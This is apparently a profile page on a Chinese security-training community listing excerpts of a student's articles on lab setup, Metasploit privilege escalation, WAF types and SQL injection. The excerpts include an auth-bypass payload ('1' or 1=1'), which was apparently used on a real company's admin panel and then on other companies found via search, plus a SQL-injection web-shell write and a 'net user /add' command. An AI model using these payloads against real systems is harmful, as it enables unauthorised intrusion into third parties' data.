Track 综合学员

yangroupaomo

9关注
4粉丝
8文章
返回网站首页

您已发布 8篇文章作品写文章

本地搭建环境,Msf提权,拿管理员密码

环境搭建1、将phpstudy设置为系统服务2、打开管理工具中的服务,进入Apache界面,进行用户设置。记得将phpstudy/apache/logs进行用户权限设置。再来查看phpstudy中网站地址。http://192.168.211.130/phpMyAdmin-4.8.1/本地环境搭建完成。Msf提权1、打开msfconsole2、打开phpmyadmin模块,选用第3个攻击模块(

 2021-10-29
 1 
 1423 

掌控安全官网存在SQL注入

也是穷了,缺金币。不小心给魔术师老师打赏了100金币,我哭。。。。然后就想找点漏洞,赚点金币。发现社区挖不动,就跑去官网看看。发现官网页面,看着真的像是有注入。我于是在后面加了id=13,发现改变传参数,页面也会跟着跳转,id=12我偷懒,就用sqlmap跑了一下https://www.zkaq.cn/news/34.html?id=13发现是PHP 7.0.33SQLite数据库但

 2021-10-19
 0 
 1961 

(限时投稿)实战记录 - 某家政系统存在注入

某家政云系统post注入(万能密码)1、打开后台http://www.······.com/worker.php直接输入1’ or 1=1 — qwe点击回车。他就居然进去了。他就进去了。。就进去了。。。是我没想到的然后敏感信息泄露知道账号密码2 、利用谷歌语法信息搜集后台登录界面,找到同样使用这个系统的公司3 、发现另外一家公司,登录成功4 、返回主页,发现有一个VIP登录,点进

 2021-4-15
 0 
 1266 

常见waf识别(小知识搬运工)

WAF可分为许多种,从产品形态上来划分,可以大致分为三类:1、硬件设备类 目前安全市场上,大多数的 WAF都属于此类。它们以一个独立的硬件设备的形态存在,支持以多种方式(如透明桥接模式、旁路模式、反向代理等)部署到网络中为后端的Web应用提供安全防护。相对于软件产品类的WAF,这类产品的优点是性能好、功能全面、支持多种模式部署等,但它的价格通常比较贵。国内的绿盟、安恒、启明星辰等厂商生产的W

 2021-2-5
 1 
 1773 

新手内网渗透流程

1、通过sql注入,写入一句话木马id=7 union select 1,'<?php eval($_REQUEST[8])?>' into outfile 'c:/phpstudy/www/125.php'函数(相当于数据库备份):into outfile、into dumpfile2、菜刀、蚁剑连接cmd基本命令net user 账号 密码 /add (新建账号密码)net

 2021-1-18
 1 
 1366 

Vulhub在kali中漏洞环境搭建教程

我们都知道,在学习网络安全的过程中,搭建漏洞靶场有着至关重要的作用。复现各种漏洞,能更好的理解漏洞产生的原因,提高自己的学习能力。下面我在kali中演示如何详细安装漏洞靶场Vulhub。1、什么是Vulhub?Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理

 2021-1-10
 1 
 113